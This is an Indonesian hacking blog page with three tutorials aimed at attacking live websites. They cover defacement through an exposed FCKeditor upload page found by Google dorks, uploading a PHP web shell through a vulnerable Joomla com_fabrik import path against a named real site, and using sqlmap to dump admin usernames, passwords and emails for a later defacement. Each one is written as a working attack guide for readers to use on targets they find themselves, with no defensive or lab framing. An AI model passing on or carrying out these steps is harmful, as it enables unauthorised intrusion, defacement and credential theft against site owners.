::

Navbar Bawah

Search This Blog

Selasa, 30 April 2013

Metode Deface Dengan Remote File Upload Exploit Vulnerability|BC4rt

Greets All

Kali ni Mr Q Bakal bagi trik deface dengan metode RFUEV ( Remote File Upload Exploit Vulnerability ) , Yap ! cara ini mungkin agan2 sudah banyak yang tau , tapi disini kita hanya mengulas saja ..

Langsung aja yoo 

Dork : 


  • inurl:editor/editor/filemanager/
  • inurl:HTMLEditor/editor/"

Steps :
  • Masukan salah satu Dork Diatas Kedalam Google
  • Pilih Salah Satu Target dari Sekian Banyak Hasil
  • Kemudian Kalian Akan Melihat Kode Berikut 
          editor/editor/filemanager/browser/mcpuk/images/icons/32
  • Ganti Kode Diatas Dengan Kode Dibawah Ini Lalu Tekan Enter
          editor/editor/filemanager/upload/test.html
  • Selanjutnya , kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.
  • Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.
  • Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.
  • Jika berhasil akan ada muncul " File Uploaded With No Errors "
  • Lalu Copykan Link Yang Ada Di Kotak " Uploaded File URL "
  • lalu pastekan di belakang website yg kamu deface . contoh : www.barrados.net/editor/images/L27.html
  • Jika berhasil kamu akan melihat script kamu muncul pada link yg tadi kamu deface

Nah itu tadi Teknik Deface menggunakan metode RFUEV , Sekian Dari Mr Q , Terimakasih
Read More --►

Exploit Dengan Joomla Component & Remote Shell Upload Vulnerability|BC4rt

Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 

Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik

Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV

Dan shell kita akan terletak di [site]/media/[shell.php]


Terus,  hajar !!!!
We Are Surabaya BlackHat !
Sekian tutorial kali ini, semoga bermanfaat.

Sumber : http://www.madura-cyber.org/2013/04/deface-dengan-joomla-component.html
Read More --►

Tutorial SQL Injection Dengan SQLMap | BC4rt

Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

biar lebih jelas saya akan menjelaskan sedikit tentang apa itu SQL injection dan database.

  • SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.
  • Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.
ok cukup penjelasanya, kita langsung aja ke tutorial sqlmap dalam memanipulasi bug SQL injection.

pertama download dulu sqlmap nya :
sqlmap.zip untuk file berekstensi .zip
sqlmap.tar.gz untuk file berekstensi tar.gz

setelah di download extract file sqlmap nya, saya sarankan di desktop saja agar lebih mudah untuk prosesnya, atau di direktori lain juga boleh tergantung dari selera kita masing-masing :-D . kemudian rename folder yang telah di extract menjadi "sqlmap" (tanpa tanda kutip).

tools ini adalah tools yang berbasis program python, jadi untuk menjalankanya kita harus menginstall program python. kalau kamu pengguna linux kamu tidak usah repot-repot untuk menginstall python karena di linux sudah ada. tapi kalau kamu pengguna windows, kamu harus menginstall program python terlebih dahulu.

download python :

Windows x86 MSI Installer (2.7.3) untuk windows x86/32 bit
Windows X86-64 MSI Installer (2.7.3) untuk windows 64 bit
Mac OS X 64-bit/32-bit x86-64/i386 Installer (2.7.3) untuk MAC OS X 10.6/10.7
www.python.org/ftp/python/2.7.3/python-2.7.3-macosx10.3.dmg untuk MAC OS 10.3 - 10.6

kalau sudah di download kita lanjut ke step berikutnya.
pertama buka dulu terminal (linux) atau CMD (windows) kemudia ketikkan

untuk linux :

user@linux:~$ cd /Desktop/sqlmap/ 
untuk windows :

C:\Documents and Settings\user> cd /desktop/sqlmap/
kemudian tekan enter. 

kita ke step selanjutnya, saya anggap kamu sudah mempunyai target kamu sendiri, kalau belum ada silahkan cari sendiri :-p .
disini saya umpamakan ada sebuah situs dengan domain name "https://www.target.com" . dan mempunyai vulnerability pada tag "index.php?id=7" dengan methode get. langsung saja kita kembali ke terminal ata cmd tadi dan ketikkan lagi

linux :
user@linux:/Desktop/sqlmap# ./sqlmap.py -u https://www.target.com/index.php?id=7 --dbs
windows :

C:\Documents and Settings\user\desktop\sqlmap>sqlmap.py -u https://www.target.com/index.php?id=7 --dbs
perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari target kita. asiikk !!!

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

  • information_schema
  • my_db
langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa ? mungkin feeling aja :-p

sekarang kita ketikkan lagi perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables
karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "./" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". saya umpamakan table-table tersebut adalah sebagai berikut.

  • admin
  • members
  • item
nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut. langsung aja kita ketikkan di terminal atau CMD perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns
 lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama columnya

  • ID
  • username
  • password
  • email_address
  • country
disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". maka saya akan kembali mengetikkan perintah

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump
 dan hasilnya saya mendapati sebagai berikut :


admin:123456:admin@target.com
 ini artinya :

  • admin = username
  • 123456 = password
  • admin@target.com = email_address
Nah sekarang kalian tinggal mencari admin loginnya :D


Sekian info dari Mr Q .
Read More --►